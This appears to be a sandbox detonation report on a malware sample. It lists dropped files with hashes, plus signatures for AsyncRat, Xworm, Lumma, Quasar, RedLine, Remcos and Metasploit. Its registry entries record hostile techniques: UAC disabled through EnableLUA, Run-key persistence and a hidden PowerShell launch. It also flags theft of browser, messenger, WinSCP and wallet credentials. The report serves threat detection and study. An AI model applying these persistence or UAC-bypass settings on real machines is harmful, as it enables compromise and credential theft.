| SHA512 | e5fe205cb0f419e0a320488d6fa4a70e5ed58f25b570b41412ebd4f32bbe504ff75acb20bfea22513102630cf653a41e5090051f20af2ed3aadb53ce16a05944 |
memory/2404-3470-0x000000001C3D0000-0x000000001C6B2000-memory.dmp
memory/2404-3472-0x0000000003800000-0x0000000003808000-memory.dmp
memory/2404-3473-0x0000000003820000-0x000000000382E000-memory.dmp
memory/2404-3474-0x000000001C860000-0x000000001C8A6000-memory.dmp
C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll
| MD5 | c2f3fbbbe6d5f48a71b6b168b1485866 |
| SHA1 | 1cd56cfc2dc07880b65bd8a1f5b7147633f5d553 |
| SHA256 | c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839 |
| SHA512 | e211f18c2850987529336e0d20aa894533c1f6a8ae6745e320fd394a9481d3a956c719ac29627afd783e36e5429c0325b98e60aee2a830e75323c276c72f845a |
memory/2404-3481-0x0000000003A30000-0x0000000003A3A000-memory.dmp
memory/2404-3482-0x0000000003BE0000-0x0000000003BE8000-memory.dmp
memory/2404-3483-0x000000001D740000-0x000000001D78E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe
| MD5 | aed024049f525c8ae6671ebdd7001c30 |
| SHA1 | fadd86e0ce140dc18f33193564d0355b02ee9b05 |
| SHA256 | 9c45c5456167f65156faa1313ad8bbaffb8aa375669bf756fe0273580a621494 |
| SHA512 | ec0846be717d200639c529a4ac14f47f6b466fa2c8231049bc474183b285c7d8ce3200ff9f9c813171de8b7eb15c63f229b4748c751a167d7eff3489249738d2 |
C:\ProgramData\registro\registros.dat
| MD5 | 81406cef986f7df7442293740b5f3d9d |
| SHA1 | 7484668efe15c43d57678956e29edf699532c963 |
| SHA256 | d9ba44cf2f5aa677cbd592a06f2e18f269b79339e11116a885d8970b82cf224a |
| SHA512 | 93395e36297ae32bc7875af660aad3d81d052638aab991889203c4dc8c435694e3f60f567ec95a7a7d49c159782321c931be11ec4c7496c24eee90879a01c186 |
memory/4700-3505-0x000000013FBE0000-0x000000013FBF8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main\main.bat
| MD5 | 3626532127e3066df98e34c3d56a1869 |
| SHA1 | 5fa7102f02615afde4efd4ed091744e842c63f78 |
| SHA256 | 2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca |
| SHA512 | dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd |
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
| MD5 | 619f7135621b50fd1900ff24aade1524 |
| SHA1 | 6c7ea8bbd435163ae3945cbef30ef6b9872a4591 |
| SHA256 | 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2 |
| SHA512 | 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628 |
memory/5020-3550-0x000000013F7E0000-0x000000013FC70000-memory.dmp
memory/5020-3553-0x000000013F7E0000-0x000000013FC70000-memory.dmp
memory/5520-3554-0x000000013F7E0000-0x000000013FC70000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LPM3TKFRHL0AA15MXLOJ.temp
| MD5 | 55ee3d976e1d39ce801cb483116997ba |
| SHA1 | 0c4f9141be45619e80336f04b06cf1defcee17fe |
| SHA256 | 0da563da593e011ed3163084c9d815eea1f5ad4969a82c227b2029c8cf9b6a53 |
| SHA512 | f56be8eb0df57ce5c2fcf66d9d0f75c1754b9341f5ca8700b8b1d62e438b328adf92898631e7f44d16b376013ff3e29cb1819c14d13f1e0493a35bf27ef2fca3 |
memory/8432-3562-0x000000001B600000-0x000000001B8E2000-memory.dmp
memory/8432-3563-0x00000000027B0000-0x00000000027B8000-memory.dmp
memory/8432-3572-0x000000001BA20000-0x000000001BA66000-memory.dmp
memory/8432-3568-0x00000000027D0000-0x00000000027DE000-memory.dmp
memory/8432-3575-0x0000000002B20000-0x0000000002B28000-memory.dmp
memory/8432-3574-0x0000000002870000-0x000000000287A000-memory.dmp
memory/8432-3585-0x000000001BE70000-0x000000001BEBE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
| MD5 | 3a425626cbd40345f5b8dddd6b2b9efa |
| SHA1 | 7b50e108e293e54c15dce816552356f424eea97a |
| SHA256 | ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1 |
| SHA512 | a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668 |
memory/7956-3630-0x0000000001280000-0x000000000139A000-memory.dmp
memory/7956-3631-0x00000000047A0000-0x00000000048BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
| MD5 | f8d528a37993ed91d2496bab9fc734d3 |
| SHA1 | 4b66b225298f776e21f566b758f3897d20b23cad |
| SHA256 | bc8458a8d78cf91129c84b153aafe8319410aacb8e14aec506897c8e0793ba02 |
| SHA512 | 75dc1bbb1388f68d121bab26fc7f6bf9dc1226417ad7ed4a7b9718999aa0f9c891fed0db3c9ea6d6ccb34288cc848dc44b20ea83a30afd4ea2e99cff51f30f5a |
memory/7956-4835-0x00000000011D0000-0x000000000125A000-memory.dmp
memory/8488-4838-0x0000000000DD0000-0x000000000154B000-memory.dmp
memory/1724-4849-0x000000001D870000-0x000000001DFEB000-memory.dmp
memory/1724-4850-0x000000001D870000-0x000000001DFEB000-memory.dmp
memory/8772-4861-0x00000000055C0000-0x0000000005722000-memory.dmp
memory/8772-4862-0x00000000021E0000-0x0000000002202000-memory.dmp
C:\ProgramData\fdgfghgfhg\logs.dat
| MD5 | 718549f0557bd03a1a15dd65f78893fb |
| SHA1 | 67d87ac939badfc47b3681bbe068427e71cf2feb |
| SHA256 | 05d30f9aae144602479638c6f09fa8d542bfda04a55104fb266b66386a9e185a |
| SHA512 | 4ae56cd3484e9b82594f3b2dd603de0498c49a5c46944c8ec9266ccac2bd719f1c04cf886932768e34829e09e2e9daa6c09ef23d504cf6540abc783edf90c145 |
C:\Users\Admin\AppData\Local\Temp\main\extracted\in.exe
| MD5 | 83d75087c9bf6e4f07c36e550731ccde |
| SHA1 | d5ff596961cce5f03f842cfd8f27dde6f124e3ae |
| SHA256 | 46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f |
| SHA512 | 044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a |
memory/5020-4890-0x000000013F7E0000-0x000000013FC70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10000870101\zx.exe
| MD5 | b40682ddc13c95e3c0228d09a3b6aae2 |
| SHA1 | ffbac13d000872dbf5a0bce2b6addf5315e59532 |
| SHA256 | f40224ca24a6d189791058779eb4c9bab224caa58b00bd787b1ff981d285d5a4 |
| SHA512 | b186331b49e7821466fd003980f9ca57f5bcf41574c1d1893b8949d8a944ffe67f06d8a67d4bfdf4599fcd4f3282c36bed1fc8585e1f8dd541e8fdf121f48eeb |
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
| MD5 | 3297554944a2e2892096a8fb14c86164 |
| SHA1 | 4b700666815448a1e0f4f389135fddb3612893ec |
| SHA256 | e0a9fcd5805e66254aa20f8ddb3bdfca376a858b19222b178cc8893f914a6495 |
| SHA512 | 499aa1679f019e29b4d871a472d24b89adddc68978317f85f095c7278f25f926cbf532c8520c2f468b3942a3e37e9be20aea9f83c68e8b5e0c9adbf69640ad25 |
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
| MD5 | 3567cb15156760b2f111512ffdbc1451 |
| SHA1 | 2fdb1f235fc5a9a32477dab4220ece5fda1539d4 |
| SHA256 | 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630 |
| SHA512 | e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba |
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
| MD5 | 87d7fffd5ec9e7bc817d31ce77dee415 |
| SHA1 | 6cc44ccc0438c65cdef248cc6d76fc0d05e79222 |
| SHA256 | 47ae8e5d41bbd1eb506a303584b124c3c8a1caeac4564252fa78856190f0f628 |
| SHA512 | 1d2c6ec8676cb1cfbe37f808440287ea6a658d3f21829b5001c3c08a663722eb0537cc681a6faa7d39dc16a101fa2bbf55989a64a7c16143f11aa96033b886a5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IAE3FJ0M\ssg[1].exe
| MD5 | 7b6730ca4da283a35c41b831b9567f15 |
| SHA1 | 92ef2fd33f713d72207209ec65f0de6eef395af5 |
| SHA256 | 94d7d12ae53ce97f38d8890383c2317ce03d45bd6ecaf0e0b9165c7066cd300c |
| SHA512 | ae2d10f9895e5f2af10b4fa87cdb7c930a531e910b55cd752b15dac77a432cc28eca6e5b32b95eeb21e238aaf2eb57e29474660cae93e734d0b6543c1d462ace |
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
| MD5 | 9821fa45714f3b4538cc017320f6f7e5 |
| SHA1 | 5bf0752889cefd64dab0317067d5e593ba32e507 |
| SHA256 | fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72 |
| SHA512 | 90afec395115d932ea272b11daa3245769bdcc9421ecd418722830259a64df19ed7eacca38000f6a846db9f4363817f13232032ab30f2ab1aa7e88097361d898 |
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
| MD5 | f89267b24ecf471c16add613cec34473 |
| SHA1 | c3aad9d69a3848cedb8912e237b06d21e1e9974f |
| SHA256 | 21f12abb6de14e72d085bc0bd90d630956c399433e85275c4c144cd9818cbf92 |
| SHA512 | c29176c7e1d58dd4e1deafcbd72956b8c27e923fb79d511ee244c91777d3b3e41d0c3977a8a9fbe094bac371253481dde5b58abf4f2df989f303e5d262e1ce4d |
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
| MD5 | 53e54ac43786c11e0dde9db8f4eb27ab |
| SHA1 | 9c5768d5ee037e90da77f174ef9401970060520e |
| SHA256 | 2f606d24809902af1bb9cb59c16a2c82960d95bff923ea26f6a42076772f1db8 |
| SHA512 | cd1f6d5f4d8cd19226151b6674124ab1e10950af5a049e8c082531867d71bfae9d7bc65641171fd55d203e4fba9756c80d11906d85a30b35ee4e8991adb21950 |
C:\Users\Admin\AppData\Local\Temp\Tmp6E5.tmp
| MD5 | dc2201821aedc24b2859345f5e75cd7c |
| SHA1 | b3fde44c544fdf1e438a9d50c82a97ab0db2cdc8 |
| SHA256 | 0f6a985a69fce712f8d04bc93b0e5396b66341dad17a0284f0a7735e04b2cd4a |
| SHA512 | e9badfc2b71ec425e492e23edbac3882b03393866acbb314d2386323da5cc0ce7cd08659711808bf1da83af520c2784200f3da598a00ac8d7938a2ab1d14e3fc |
C:\ProgramData\Remcos\logs.dat
| MD5 | 01dd6832b7164f7b8607245bffe1698d |
| SHA1 | 9f6e968a85a6a2fb8c297818dab9f36e23d3edec |
| SHA256 | 4ee28941c5665393b8d0e740312b2dda7cd7e03aff0ffcdda72f89f021f58201 |
| SHA512 | da4e232a96bbf6c32656dad0b1ecbc1ce8fb0767607948bf48ecccb1ae1f531a95374792f6c1bc5b6750782467516534fa80e18ddbae69ddf019d32322d44da2 |
C:\ProgramData\Remcos\logs.dat
| MD5 | 15d23f8b2543d30d674f2d477b5c5716 |
| SHA1 | 9b1251850723622f77a3850f189fb2d238f7806f |
| SHA256 | 569ca39403f0d4dca15856c4b1c1c602f526cca635cd6d102cc09dccf044702c |
| SHA512 | 6614d10ad8a4cd2f291a79b522bda7d30ab0cb126aedd670599b5f8be0ece4dcf9869e4ae7cfc6ae6120ab5fdb9b1804e04357fcf4e306f07dab91adf8439019 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SQ1Y151E8OTZ4X9QV5KP.temp
| MD5 | c17ef8587a629cc563bd6521078b5af8 |
| SHA1 | 338668330cebdf7bd0f280d9b3dc51bfb86cc69e |
| SHA256 | cada4bb6a47bfbc8dcc59a94352bb2110b056d2c2562a9b3115ce982eb33cba8 |
| SHA512 | f79203e924343850dc4362663bdcde43171cf48a616eefb90995f43671470c9fe48cebe1f0404f5f6314488c60365928ba333a93ffe96d47b7b0f046514556f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8452S9S3\76561199804377619[1].htm
| MD5 | 3ce40da0b2f348adb385c818427d64d5 |
| SHA1 | 09d720dbc65e96cd3ff7e6616cb8295dfa938ce5 |
| SHA256 | e013d5075c41c2a87117cd7f868165d935acdbed66aa49605542a93993fe095c |
| SHA512 | 9c1997b8539bc0e0b32b9c1686b97daf8d421f5a4d86784761474551d643975f864c971d9a5e4b8e266090f688c7f6c10f74900bead05059777a97272dead5c9 |
C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWAConfig.bin
| MD5 | 829e12a40ecb30a313d4516e06c1d02c |
| SHA1 | 345d93d8f2dee749da3c12afb4f5a7c549638b40 |
| SHA256 | 7be4fbfc69a1404b20d31c7b24adb2ceba8986dac2ce0ba979a9a445ec1b5baf |
| SHA512 | 1abe58a8211dbe3261e529a08e20d8b65a0da06ff6c6e8742ab82f7bd3ac7366d41fc3c4373e52c63576c69d144983b29e59e6fa5d62808b493c9c9b52138722 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-12-14 20:23
Reported
2024-12-15 01:15
Platform
win7-20241010-es
Max time kernel
1091s
Max time network
1204s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Lumma Stealer, LummaC
Lumma family
Merlin
Merlin family
Merlin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Xworm
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\AppData\Local\Temp\a\x.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk | C:\Users\Admin\AppData\Local\Temp\a\x.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\HardDiskSentinea = "C:\\Users\\Admin\\Favorites\\HardDiskSentine\\redist\\HardDiskSentinelBin.exe" | C:\Users\Admin\AppData\Local\Temp\a\null.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\BingWallpaperApp = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\8CDE4F4D02991030361446\\8CDE4F4D02991030361446.exe" | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" | C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\VmManagedSetup.exe'\"" | C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\8CDE4F4D02991030361446\\8CDE4F4D02991030361446.exe" | C:\Users\Admin\AppData\Local\Temp\a\dropper.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\ElectronArtsCLI = "C:\\Users\\Admin\\Videos\\ElectronArts\\Bin\\ElectronArtsCLI.exe" | C:\Users\Admin\AppData\Local\Temp\a\Out2.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
